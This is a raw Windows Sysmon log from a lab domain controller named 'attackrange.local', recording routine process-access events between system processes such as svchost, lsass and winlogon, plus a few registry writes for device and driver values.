13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+56c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.789{59A5CD1D-8E46-6005-1400-00000000A301}13042548C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x80000000000000009963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-01-18 13:58:16.664{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Enum\SWD\ScDeviceEnumBus\1\FriendlyNameMicrosoft Passport Container Enumeration Bus 13241300x80000000000000009962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:16.649{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Control\Class\{62f9c741-b25a-46ce-b54c-9bccce08b6f2}\0003\DriverVersion10.0.14393.0 13241300x80000000000000009961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-01-18 13:58:16.649{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Enum\SWD\ScDeviceEnumBus\0\FriendlyNameSmart Card Device Enumeration Bus 13241300x80000000000000009960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:16.649{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Control\Class\{62f9c741-b25a-46ce-b54c-9bccce08b6f2}\0002\DriverVersion10.0.14393.0 10341000x80000000000000009959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.649{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.649{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.649{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.649{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.649{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 